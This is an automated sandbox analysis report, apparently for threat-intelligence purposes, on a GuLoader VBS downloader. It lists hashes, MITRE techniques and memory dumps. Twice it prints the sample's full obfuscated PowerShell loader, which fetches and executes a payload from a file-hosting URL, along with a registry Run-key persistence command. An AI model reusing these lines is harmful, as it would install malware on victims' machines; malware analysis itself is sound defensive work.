guloader | b632a2ab492dbe0f71c18cab99b61bded82cbb66696f2d30c9bc354605ebb136

Analysis

max time kernel
150s
max time network
131s
platform
windows7_x64
resource
win7-20231020-en
resource tags

arch:x64arch:x86image:win7-20231020-enlocale:en-usos:windows7-x64system
submitted
26-10-2023 07:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

BTSR000166442.vbs
Size

72KB
MD5

91192904788702d6692ef01f9a6d8989
SHA1

14f1f98a04b6eb9c3d22a522dc72cbf3221d00d6
SHA256

b632a2ab492dbe0f71c18cab99b61bded82cbb66696f2d30c9bc354605ebb136
SHA512

54f1bca79c4265c85c9a4d72426a7b97c52585674bf910294628b1c7ca979b5cfd538c42a665d06b768c603e720f7019d583d44e06802adb64b24c82a3bda345
SSDEEP

1536:fabO/mdBAdZ1tuJErgT2nOCzFx7zDiPWBvkkhO:Sbi2A31tAT2n1Fx3DOWBvkkhO

Score

10^/10

guloader downloader persistence

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Windows\CurrentVersion\Run\Gaardej = "%Casewa% -w 1 $Isaakadv=(Get-ItemProperty -Path 'HKCU:\\Nubbledno\\').Dirkenesu194;%Casewa% ($Isaakadv)"	wab.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

pid	Process
1724	wab.exe
1724	wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2768	powershell.exe
1724	wab.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2768 set thread context of 1724	2768	powershell.exe	32

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2756	powershell.exe
2768	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2768	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2756	powershell.exe
Token: SeDebugPrivilege	2768	powershell.exe

Suspicious use of WriteProcessMemory 13 IoCs

description	pid	Process	procid_target
PID 2156 wrote to memory of 2756	2156	WScript.exe	29
PID 2156 wrote to memory of 2756	2156	WScript.exe	29
PID 2156 wrote to memory of 2756	2156	WScript.exe	29
PID 2756 wrote to memory of 2768	2756	powershell.exe	31
PID 2756 wrote to memory of 2768	2756	powershell.exe	31
PID 2756 wrote to memory of 2768	2756	powershell.exe	31
PID 2756 wrote to memory of 2768	2756	powershell.exe	31
PID 2768 wrote to memory of 1724	2768	powershell.exe	32
PID 2768 wrote to memory of 1724	2768	powershell.exe	32
PID 2768 wrote to memory of 1724	2768	powershell.exe	32
PID 2768 wrote to memory of 1724	2768	powershell.exe	32
PID 2768 wrote to memory of 1724	2768	powershell.exe	32
PID 2768 wrote to memory of 1724	2768	powershell.exe	32

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\BTSR000166442.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2156
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "function Minimif ([String]$Asplanch){$Backingg = 8;For($Tricapsul=7; $Tricapsul -lt $Asplanch.Length-1; $Tricapsul+=$Backingg){$Tilvks=$Tilvks+$Asplanch.Substring($Tricapsul, 1)};$Tilvks;}$Tjrspri=Minimif 'ventekjhEpigramtfucusestDuplicepVrtdyrssSammenf:Boyards/Komiker/StickmedknottilrGuckedki ReprodvSkulkereRigsbib.RunderngProteseoTrimpreoAtrocoegAislemolSkrivesecaressk. EmnetwcAnsttelounfleecmUncashe/TrevlemuBefragtcCyclama?SideroneMembranxEmeticapSkandero Afdelir Photost upaaag= HjlpeodBlowoffoGruppemwMyxomasnBabassulKarnappoTheoreta DifferdTabulat&Vrngbili ProngbdGrundst=Disprac1Dibblesnbrowsin-LngdegrcbilimpoTHydratiO UntestzOpfindebKvaliteYAbiturer EstranzkusinenABalteterFilmkunxVaagnedpObskuraCKursusizSeptendrPnitentL Armora6KnkketsB Oxyben0Hvlbnke4 BanguiRPacificHBemandiqOverdon4Wilsonk_birkeniGUniteabjudenlann overst0 FerrattMeditat ';$Tilvks01=Minimif 'Sierrasi KlubhueFrasortxKonomid ';$monopylae= $Tilvks01;$Thalas = Minimif ' Porphy\MassagesAcetylsyMisknowsOpvoksew SalzfeononinflwQuinari6Kageske4Udmejsl\SkjorteW madammiSpunsninHypoderdNamedbeoIntagliwRegietss ColickPSnapsflo DrkarmwPerichoeDeklassr MaidenSKaolinehBrudefreBolsterl IgangslSybilla\JatrophvUntenty1Kymogra.Telefil0Fugleun\ FiskekpSemblanoSidelinwKispuspeValetedrMarketesDumfounh CoraczeTecaactl BandollAcineti. proteieStngninxArendaleAfstraf '; & ($Tilvks01) (Minimif 'Haendel$ModstanULugtesanRusserblKlangfuiIlanaantElectroi VaservgReceiveaBrnebid2Indgaae=Kighost$UkultureParleyinTrenchcvShoaled: LejekawPredisciForsknin FodboldCaptainiJargoner biocid ') ; . ($Tilvks01) (Minimif ' orneri$RallencT UnvigihVelstanaWienervlHundredaSkarptasKontakt=Subfree$SmertetUOsmolovnProfesslFleecediSpytklat BehypoiOverfrogGennemsa Unjack2 Stigma+omsadli$NondenuTSuperimhSukkervaComposilMemoranaLlingtasBoneset ') ; & ($Tilvks01) (Minimif ' Hyrekr$KvartseUAnnonactPlugginmTogrevimSwinglee BijektlKirkefei Sandflg Anisot nonopti=Begejst lystfar(Unfeign(BagganggStatsttwBengtelmAttractironspai WhitelywCovetisiSprgesknNodeskr3Underin2Beskyld_ Leptocp CunninrGelejdeoKiwikiwclocuscaeRntgenbsChatties Baldyr Polyand-ResprmiFSttedom MandatePCanonesrStomatoomultihec Fornike NittensgravrstsGlasnetIBlyantsdasfreds=Requite$ Kultiv{PadderoPRendestIOlecranDSknders}Tragtni)Approba.KravletCUdlaansoForstanmkalkvrkmPanganeaBibelfan Therefd TreachLunctimpivadsksdnPalamabeJespers)Leadpro Besmitt-elbowbos Unbosop OpkbeslMilieuaiFortolktordskif Skdesyn[RekviemcBedragehAscendea PrograrSnobdom]Heindri3Bookmak4Tyranni '); & ($Tilvks01) (Minimif ' Projek$ BernichPrognosyTwinlikrSkulkere Naturet ImmingsUndlivecTekstndoCallianiDissimi Defiles=Holoste Frihold$VagtmesUMuscicotverificmNonscrimsubgenieTremblelRingeuniTekknergEssayis[ Segreg$ infamiU sirupst CottonmMonologmBellowseUndershlCuttingi AaremagGiveren. AprjtecMalpracoSnefygnuHulledanCalcanetFortuna-Brierya2 Borger]Stammre '); .($Tilvks01) (Minimif 'Sprgere$LaanetsBgengivea EntusinUddanned Rotondl PrologyRenniogsLinjefa=android(OmstyrtTGulnbbeeSocagers HeterotForuren-TotemplP MalignaOuttyratKontinghSucurye Smaattr$LandsdoTBeholdnhHulkortaChampaklOmbrellaStandsnsCaptura)Benzins Taalmo- StumpiAKlepladnLbedecid Whumml janskee(Serinev[ PligteI Vilkaan BopladtAtomknuPElskerstHypersprUnstran] Kanons:Nabonul:gasturbsUninnoci SumbulzDerodidePterost Chinoo- ForkobeVulcaniqTempelr Timbale8 svovli)Partiti ') ;if ($Bandlys) { & $Thalas $hyretscoi;} else {;$Tilvks00=Minimif ' RysterSHalvmaatSkovhyta DumpinrPannelstEplotin-SpindhrB TagvaniTilintetBremsessSqualidTDemioxarBegyndeaPredecrnMentalhsChromatfNonvisueOutgangrdrowsih Dolcian-machiavSAlfedano TeternuUnderforFritidsc DatopaeUdddepa Sodsag$ ForyngT DrivanjMultinerEdwardisUnmobilpOpskrivrTerminsiTrstetr homoge-SengeneDHelfabreFriseris ConsumtIrreguli oedelanAnretteaHolohedt TordneiforfatnoReadjusn Spence Inhaust$BattlerUHeterosnBundfrolAffindeiMuskeletBenevoliAmpliatgNucleola Proecc2 Etymol '; . ($Tilvks01) (Minimif ' Monosy$TvangsaUSquarisnDriftsbl VerbaliElectictskranteiPaulasgg NervouaPseudon2 Recogn=Predisp$GkantereRequisin TypolovAktorsf:EfterstaHenvisspdeaktivp NotaridAlterbraUdspekut indkomaAnabolo ') ; & ($Tilvks01) (Minimif 'brdskriIGrydelamSpigerpp Erogeno JernmarBravuratGoodohu-StrstemMSnickleoFrenetidForsteruAnklagelUtricule sprogr DiskingBExpositiUnrestitSrbeskasIcositeT Forkvar Fotohaa OpskrinSmeechksPrespecfForsorgeClubionrGuttera ') ;$Unlitiga2=$Unlitiga2+'\freezed.Kry';while (-not $Uret) { & ($Tilvks01) (Minimif 'Abbedie$HomodynU VariatrOmfavneeProsopitXiphipl=Strombu(RekalkuTMedarbee AnaglysUnlistytEinkorn-UncompePPalaeoeaRenpristOphicalhPomsmal Teterne$GranuleUCounternBuderuplDecoloniAmphophtKontroliAdoptivgDermencaShillal2Militrg)udlejen ') ; & ($Tilvks01) $Tilvks00; & ($Tilvks01) (Minimif 'BrnerigSRedisputMetalloastilenertrophobt Stikli-MucovisSGazingllNicolinePlectrue Quillsp reluct Genose5Blamskv ');} & ($Tilvks01) (Minimif 'Skyggeb$LimbingEKeratombKasusinu PasteurVindigb Uncoach=Metateg SlidbaaGHeraldeeSlevenet Halvtr-UnsenatCLangtidoUnderben EmirertGrydelae KobraenCocinertJogging Appetit$EphemerURedenemn ComforlOverflaiDesignftOvergeniStormcegHydroscaDybblaa2Cuppasb '); .($Tilvks01) (Minimif 'Bennela$ChancieDquadrijrSquamaeaPalatalwInfoskeaCaidkufrSottesetArtille Svuppen= Dehumi Spring[UnjamheSpseudomyNarratrsLittondtForbikreParisermFlintov.forlydeC InhibioOverempnTrykfejv LeibnieAntabusrImponertBlodsud]Fedevar:Nabobyh:AuxiliaFDragesor BemestoskmtsommUnharmoBDonecklaSpuriousRentviseHornugl6Boloney4GainfulSPulsaartInddatarPrvelsliSemirurn IndsmugEctopla(Asyndet$SilicoaEKonvergbMeetlytuGennemsrAfstemn) hawaii '); & ($Tilvks01) (Minimif ' Itnonh$OphidseTnichelii FjaserlAabenplvSubtilikbegyndesGroundl2 augiti Skhiano=Respeci Argume[OzarkitS Blennoy ArbejdsFinindstVowersie FanefjmReparat.KlenodiTAlachahe kontokxKyphositSelvtil.BestrbeE KlbrignJournalcGestikuo farewedTelefoniReservanSteroidgStjgene] Forsyt: Filagr: UnoverAAmpulskSKapacitCssterstI dropskIkalewiv.PteroidGelektroe BaldritGennemlSSubjecttAlmindergeorassiAutarchnStetoskg gennem(Eksamen$ TessieD ReagenrHnsletvaRringenwKonditeaTrinflgrdidaktitKonnyci)Monitor '); . ($Tilvks01) (Minimif 'Magnumf$LavishiABayrersm CinchoaExpetibiExtremi=Sunrose$DuetsafT Rummeti Arbejdl FatalivTyrofelkAguardisHootmal2palliat.ApprehesProwutiuLandstrbSognebasEmbedmetSpuddler protociTarmenenOutbarkgAmfibie(Persons2Pillarw3Mrkedag9Aktions9Rjserne6Rrlgnin3Melipha,Ungrasp2Fotohan0Unorgan3Torpedo3Ametyst0Rearran)Affaire '); . ($Tilvks01) $Amai;}"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2756
- - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "function Minimif ([String]$Asplanch){$Backingg = 8;For($Tricapsul=7; $Tricapsul -lt $Asplanch.Length-1; $Tricapsul+=$Backingg){$Tilvks=$Tilvks+$Asplanch.Substring($Tricapsul, 1)};$Tilvks;}$Tjrspri=Minimif 'ventekjhEpigramtfucusestDuplicepVrtdyrssSammenf:Boyards/Komiker/StickmedknottilrGuckedki ReprodvSkulkereRigsbib.RunderngProteseoTrimpreoAtrocoegAislemolSkrivesecaressk. EmnetwcAnsttelounfleecmUncashe/TrevlemuBefragtcCyclama?SideroneMembranxEmeticapSkandero Afdelir Photost upaaag= HjlpeodBlowoffoGruppemwMyxomasnBabassulKarnappoTheoreta DifferdTabulat&Vrngbili ProngbdGrundst=Disprac1Dibblesnbrowsin-LngdegrcbilimpoTHydratiO UntestzOpfindebKvaliteYAbiturer EstranzkusinenABalteterFilmkunxVaagnedpObskuraCKursusizSeptendrPnitentL Armora6KnkketsB Oxyben0Hvlbnke4 BanguiRPacificHBemandiqOverdon4Wilsonk_birkeniGUniteabjudenlann overst0 FerrattMeditat ';$Tilvks01=Minimif 'Sierrasi KlubhueFrasortxKonomid ';$monopylae= $Tilvks01;$Thalas = Minimif ' Porphy\MassagesAcetylsyMisknowsOpvoksew SalzfeononinflwQuinari6Kageske4Udmejsl\SkjorteW madammiSpunsninHypoderdNamedbeoIntagliwRegietss ColickPSnapsflo DrkarmwPerichoeDeklassr MaidenSKaolinehBrudefreBolsterl IgangslSybilla\JatrophvUntenty1Kymogra.Telefil0Fugleun\ FiskekpSemblanoSidelinwKispuspeValetedrMarketesDumfounh CoraczeTecaactl BandollAcineti. proteieStngninxArendaleAfstraf '; & ($Tilvks01) (Minimif 'Haendel$ModstanULugtesanRusserblKlangfuiIlanaantElectroi VaservgReceiveaBrnebid2Indgaae=Kighost$UkultureParleyinTrenchcvShoaled: LejekawPredisciForsknin FodboldCaptainiJargoner biocid ') ; . ($Tilvks01) (Minimif ' orneri$RallencT UnvigihVelstanaWienervlHundredaSkarptasKontakt=Subfree$SmertetUOsmolovnProfesslFleecediSpytklat BehypoiOverfrogGennemsa Unjack2 Stigma+omsadli$NondenuTSuperimhSukkervaComposilMemoranaLlingtasBoneset ') ; & ($Tilvks01) (Minimif ' Hyrekr$KvartseUAnnonactPlugginmTogrevimSwinglee BijektlKirkefei Sandflg Anisot nonopti=Begejst lystfar(Unfeign(BagganggStatsttwBengtelmAttractironspai WhitelywCovetisiSprgesknNodeskr3Underin2Beskyld_ Leptocp CunninrGelejdeoKiwikiwclocuscaeRntgenbsChatties Baldyr Polyand-ResprmiFSttedom MandatePCanonesrStomatoomultihec Fornike NittensgravrstsGlasnetIBlyantsdasfreds=Requite$ Kultiv{PadderoPRendestIOlecranDSknders}Tragtni)Approba.KravletCUdlaansoForstanmkalkvrkmPanganeaBibelfan Therefd TreachLunctimpivadsksdnPalamabeJespers)Leadpro Besmitt-elbowbos Unbosop OpkbeslMilieuaiFortolktordskif Skdesyn[RekviemcBedragehAscendea PrograrSnobdom]Heindri3Bookmak4Tyranni '); & ($Tilvks01) (Minimif ' Projek$ BernichPrognosyTwinlikrSkulkere Naturet ImmingsUndlivecTekstndoCallianiDissimi Defiles=Holoste Frihold$VagtmesUMuscicotverificmNonscrimsubgenieTremblelRingeuniTekknergEssayis[ Segreg$ infamiU sirupst CottonmMonologmBellowseUndershlCuttingi AaremagGiveren. AprjtecMalpracoSnefygnuHulledanCalcanetFortuna-Brierya2 Borger]Stammre '); .($Tilvks01) (Minimif 'Sprgere$LaanetsBgengivea EntusinUddanned Rotondl PrologyRenniogsLinjefa=android(OmstyrtTGulnbbeeSocagers HeterotForuren-TotemplP MalignaOuttyratKontinghSucurye Smaattr$LandsdoTBeholdnhHulkortaChampaklOmbrellaStandsnsCaptura)Benzins Taalmo- StumpiAKlepladnLbedecid Whumml janskee(Serinev[ PligteI Vilkaan BopladtAtomknuPElskerstHypersprUnstran] Kanons:Nabonul:gasturbsUninnoci SumbulzDerodidePterost Chinoo- ForkobeVulcaniqTempelr Timbale8 svovli)Partiti ') ;if ($Bandlys) { & $Thalas $hyretscoi;} else {;$Tilvks00=Minimif ' RysterSHalvmaatSkovhyta DumpinrPannelstEplotin-SpindhrB TagvaniTilintetBremsessSqualidTDemioxarBegyndeaPredecrnMentalhsChromatfNonvisueOutgangrdrowsih Dolcian-machiavSAlfedano TeternuUnderforFritidsc DatopaeUdddepa Sodsag$ ForyngT DrivanjMultinerEdwardisUnmobilpOpskrivrTerminsiTrstetr homoge-SengeneDHelfabreFriseris ConsumtIrreguli oedelanAnretteaHolohedt TordneiforfatnoReadjusn Spence Inhaust$BattlerUHeterosnBundfrolAffindeiMuskeletBenevoliAmpliatgNucleola Proecc2 Etymol '; . ($Tilvks01) (Minimif ' Monosy$TvangsaUSquarisnDriftsbl VerbaliElectictskranteiPaulasgg NervouaPseudon2 Recogn=Predisp$GkantereRequisin TypolovAktorsf:EfterstaHenvisspdeaktivp NotaridAlterbraUdspekut indkomaAnabolo ') ; & ($Tilvks01) (Minimif 'brdskriIGrydelamSpigerpp Erogeno JernmarBravuratGoodohu-StrstemMSnickleoFrenetidForsteruAnklagelUtricule sprogr DiskingBExpositiUnrestitSrbeskasIcositeT Forkvar Fotohaa OpskrinSmeechksPrespecfForsorgeClubionrGuttera ') ;$Unlitiga2=$Unlitiga2+'\freezed.Kry';while (-not $Uret) { & ($Tilvks01) (Minimif 'Abbedie$HomodynU VariatrOmfavneeProsopitXiphipl=Strombu(RekalkuTMedarbee AnaglysUnlistytEinkorn-UncompePPalaeoeaRenpristOphicalhPomsmal Teterne$GranuleUCounternBuderuplDecoloniAmphophtKontroliAdoptivgDermencaShillal2Militrg)udlejen ') ; & ($Tilvks01) $Tilvks00; & ($Tilvks01) (Minimif 'BrnerigSRedisputMetalloastilenertrophobt Stikli-MucovisSGazingllNicolinePlectrue Quillsp reluct Genose5Blamskv ');} & ($Tilvks01) (Minimif 'Skyggeb$LimbingEKeratombKasusinu PasteurVindigb Uncoach=Metateg SlidbaaGHeraldeeSlevenet Halvtr-UnsenatCLangtidoUnderben EmirertGrydelae KobraenCocinertJogging Appetit$EphemerURedenemn ComforlOverflaiDesignftOvergeniStormcegHydroscaDybblaa2Cuppasb '); .($Tilvks01) (Minimif 'Bennela$ChancieDquadrijrSquamaeaPalatalwInfoskeaCaidkufrSottesetArtille Svuppen= Dehumi Spring[UnjamheSpseudomyNarratrsLittondtForbikreParisermFlintov.forlydeC InhibioOverempnTrykfejv LeibnieAntabusrImponertBlodsud]Fedevar:Nabobyh:AuxiliaFDragesor BemestoskmtsommUnharmoBDonecklaSpuriousRentviseHornugl6Boloney4GainfulSPulsaartInddatarPrvelsliSemirurn IndsmugEctopla(Asyndet$SilicoaEKonvergbMeetlytuGennemsrAfstemn) hawaii '); & ($Tilvks01) (Minimif ' Itnonh$OphidseTnichelii FjaserlAabenplvSubtilikbegyndesGroundl2 augiti Skhiano=Respeci Argume[OzarkitS Blennoy ArbejdsFinindstVowersie FanefjmReparat.KlenodiTAlachahe kontokxKyphositSelvtil.BestrbeE KlbrignJournalcGestikuo farewedTelefoniReservanSteroidgStjgene] Forsyt: Filagr: UnoverAAmpulskSKapacitCssterstI dropskIkalewiv.PteroidGelektroe BaldritGennemlSSubjecttAlmindergeorassiAutarchnStetoskg gennem(Eksamen$ TessieD ReagenrHnsletvaRringenwKonditeaTrinflgrdidaktitKonnyci)Monitor '); . ($Tilvks01) (Minimif 'Magnumf$LavishiABayrersm CinchoaExpetibiExtremi=Sunrose$DuetsafT Rummeti Arbejdl FatalivTyrofelkAguardisHootmal2palliat.ApprehesProwutiuLandstrbSognebasEmbedmetSpuddler protociTarmenenOutbarkgAmfibie(Persons2Pillarw3Mrkedag9Aktions9Rjserne6Rrlgnin3Melipha,Ungrasp2Fotohan0Unorgan3Torpedo3Ametyst0Rearran)Affaire '); . ($Tilvks01) $Amai;}"
    3⤵
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2768
  - - C:\Program Files (x86)\windows mail\wab.exe
      "C:\Program Files (x86)\windows mail\wab.exe"
      4⤵
      Adds Run key to start application
      Suspicious use of NtCreateThreadExHideFromDebugger
      Suspicious use of NtSetInformationThreadHideFromDebugger
      PID:1724

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
f6a0c85c4cd4370894fc058c4d7e6aea

SHA1
88e4d12c9570294f97bebce27f09ed64ea90a2e6

SHA256
7cbd7b6f1fb80fbc07efec0beb38dc9214e35265bf31aabc5ac6f501045c8cc1

SHA512
5c283a00c982b61e54e0446d91e5f6bb2ed173f75f9425fcf687ebbc3c21175268e461818dcb491dd69bb2fbd024b4a7fefba662ab6ac0bf2e9aa48bd7def84c

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabFE1D.tmp

Filesize
61KB

MD5
f3441b8572aae8801c04f3060b550443

SHA1
4ef0a35436125d6821831ef36c28ffaf196cda15

SHA256
6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf

SHA512
5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RRE140OOTHOAT1P795XM.temp

Filesize
7KB

MD5
68fffe0e79d028274d39cf4f764554e1

SHA1
10c6d8f12303595c41e59dbc267b925cc5423c6f

SHA256
0160e44391c1972f2eb75fe8f85a5e3634ed3e79f2815e24ea450a2910ceb5e8

SHA512
6f035605ccd331006f33a8607928f40c5c735a2f37ed54de27a09b9d3be28e050e4dae6ccce43aee27c4f912652c1d848af419b203f4dbf937a25ec979586380

Download Submit
memory/1724-85-0x000000006F770000-0x00000000707D2000-memory.dmp

Filesize
16.4MB

Download
memory/1724-88-0x000000006F770000-0x00000000707D2000-memory.dmp

Filesize
16.4MB

Download
memory/1724-105-0x000000006F770000-0x00000000707D2000-memory.dmp

Filesize
16.4MB

Download
memory/1724-104-0x000000006F770000-0x00000000707D2000-memory.dmp

Filesize
16.4MB

Download
memory/1724-103-0x000000006F770000-0x00000000707D2000-memory.dmp

Filesize
16.4MB

Download
memory/1724-102-0x000000006F770000-0x00000000707D2000-memory.dmp

Filesize
16.4MB

Download
memory/1724-101-0x000000006F770000-0x00000000707D2000-memory.dmp

Filesize
16.4MB

Download
memory/1724-100-0x000000006F770000-0x00000000707D2000-memory.dmp

Filesize
16.4MB

Download
memory/1724-99-0x000000006F770000-0x00000000707D2000-memory.dmp

Filesize
16.4MB

Download
memory/1724-98-0x000000006F770000-0x00000000707D2000-memory.dmp

Filesize
16.4MB

Download
memory/1724-96-0x000000006F770000-0x00000000707D2000-memory.dmp

Filesize
16.4MB

Download
memory/1724-95-0x000000006F770000-0x00000000707D2000-memory.dmp

Filesize
16.4MB

Download
memory/1724-94-0x000000006F770000-0x00000000707D2000-memory.dmp

Filesize
16.4MB

Download
memory/1724-71-0x000000006F770000-0x00000000707D2000-memory.dmp

Filesize
16.4MB

Download
memory/1724-93-0x000000006F770000-0x00000000707D2000-memory.dmp

Filesize
16.4MB

Download
memory/1724-92-0x000000006F770000-0x00000000707D2000-memory.dmp

Filesize
16.4MB

Download
memory/1724-91-0x000000006F770000-0x00000000707D2000-memory.dmp

Filesize
16.4MB

Download
memory/1724-90-0x000000006F770000-0x00000000707D2000-memory.dmp

Filesize
16.4MB

Download
memory/1724-89-0x000000006F770000-0x00000000707D2000-memory.dmp

Filesize
16.4MB

Download
memory/1724-75-0x000000006F770000-0x00000000707D2000-memory.dmp

Filesize
16.4MB

Download
memory/1724-87-0x000000006F770000-0x00000000707D2000-memory.dmp

Filesize
16.4MB

Download
memory/1724-86-0x000000006F770000-0x00000000707D2000-memory.dmp

Filesize
16.4MB

Download
memory/1724-84-0x000000006F770000-0x00000000707D2000-memory.dmp

Filesize
16.4MB

Download
memory/1724-82-0x000000006F770000-0x00000000707D2000-memory.dmp

Filesize
16.4MB

Download
memory/1724-68-0x0000000000280000-0x0000000001A9B000-memory.dmp

Filesize
24.1MB

Download
memory/1724-44-0x0000000077460000-0x0000000077609000-memory.dmp

Filesize
1.7MB

Download
memory/1724-45-0x0000000000280000-0x0000000001A9B000-memory.dmp

Filesize
24.1MB

Download
memory/1724-52-0x000000006F770000-0x00000000707D2000-memory.dmp

Filesize
16.4MB

Download
memory/1724-81-0x000000006F770000-0x00000000707D2000-memory.dmp

Filesize
16.4MB

Download
memory/1724-80-0x000000006F770000-0x00000000707D2000-memory.dmp

Filesize
16.4MB

Download
memory/1724-67-0x0000000000280000-0x0000000001A9B000-memory.dmp

Filesize
24.1MB

Download
memory/1724-69-0x000000006F770000-0x00000000707D2000-memory.dmp

Filesize
16.4MB

Download
memory/1724-79-0x000000006F770000-0x00000000707D2000-memory.dmp

Filesize
16.4MB

Download
memory/1724-78-0x000000006F770000-0x00000000707D2000-memory.dmp

Filesize
16.4MB

Download
memory/1724-43-0x0000000000280000-0x0000000001A9B000-memory.dmp

Filesize
24.1MB

Download
memory/1724-76-0x000000006F770000-0x00000000707D2000-memory.dmp

Filesize
16.4MB

Download
memory/1724-73-0x000000006F770000-0x00000000707D2000-memory.dmp

Filesize
16.4MB

Download
memory/1724-74-0x000000006F770000-0x00000000707D2000-memory.dmp

Filesize
16.4MB

Download
memory/2756-30-0x0000000002740000-0x00000000027C0000-memory.dmp

Filesize
512KB

Download
memory/2756-32-0x0000000002740000-0x00000000027C0000-memory.dmp

Filesize
512KB

Download
memory/2756-9-0x0000000002740000-0x00000000027C0000-memory.dmp

Filesize
512KB

Download
memory/2756-8-0x0000000002740000-0x00000000027C0000-memory.dmp

Filesize
512KB

Download
memory/2756-10-0x000007FEF5AA0000-0x000007FEF643D000-memory.dmp

Filesize
9.6MB

Download
memory/2756-6-0x000007FEF5AA0000-0x000007FEF643D000-memory.dmp

Filesize
9.6MB

Download
memory/2756-5-0x0000000002420000-0x0000000002428000-memory.dmp

Filesize
32KB

Download
memory/2756-83-0x000007FEF5AA0000-0x000007FEF643D000-memory.dmp

Filesize
9.6MB

Download
memory/2756-11-0x0000000002740000-0x00000000027C0000-memory.dmp

Filesize
512KB

Download
memory/2756-7-0x0000000002740000-0x00000000027C0000-memory.dmp

Filesize
512KB

Download
memory/2756-4-0x000000001B150000-0x000000001B432000-memory.dmp

Filesize
2.9MB

Download
memory/2756-28-0x000007FEF5AA0000-0x000007FEF643D000-memory.dmp

Filesize
9.6MB

Download
memory/2756-29-0x0000000002740000-0x00000000027C0000-memory.dmp

Filesize
512KB

Download
memory/2756-31-0x0000000002740000-0x00000000027C0000-memory.dmp

Filesize
512KB

Download
memory/2768-34-0x00000000026E0000-0x0000000002720000-memory.dmp

Filesize
256KB

Download
memory/2768-18-0x00000000026E0000-0x0000000002720000-memory.dmp

Filesize
256KB

Download
memory/2768-33-0x0000000073300000-0x00000000738AB000-memory.dmp

Filesize
5.7MB

Download
memory/2768-35-0x0000000005300000-0x0000000005301000-memory.dmp

Filesize
4KB

Download
memory/2768-36-0x0000000006480000-0x0000000007C9B000-memory.dmp

Filesize
24.1MB

Download
memory/2768-37-0x0000000006480000-0x0000000007C9B000-memory.dmp

Filesize
24.1MB

Download
memory/2768-39-0x0000000006480000-0x0000000007C9B000-memory.dmp

Filesize
24.1MB

Download
memory/2768-72-0x0000000073300000-0x00000000738AB000-memory.dmp

Filesize
5.7MB

Download
memory/2768-17-0x00000000026E0000-0x0000000002720000-memory.dmp

Filesize
256KB

Download
memory/2768-16-0x00000000026E0000-0x0000000002720000-memory.dmp

Filesize
256KB

Download
memory/2768-15-0x0000000073300000-0x00000000738AB000-memory.dmp

Filesize
5.7MB

Download
memory/2768-14-0x0000000073300000-0x00000000738AB000-memory.dmp

Filesize
5.7MB

Download
memory/2768-40-0x0000000077460000-0x0000000077609000-memory.dmp

Filesize
1.7MB

Download
memory/2768-42-0x0000000077650000-0x0000000077726000-memory.dmp

Filesize
856KB

Download
memory/2768-77-0x0000000006480000-0x0000000007C9B000-memory.dmp

Filesize
24.1MB

Download
memory/2768-70-0x00000000026E0000-0x0000000002720000-memory.dmp

Filesize
256KB

Download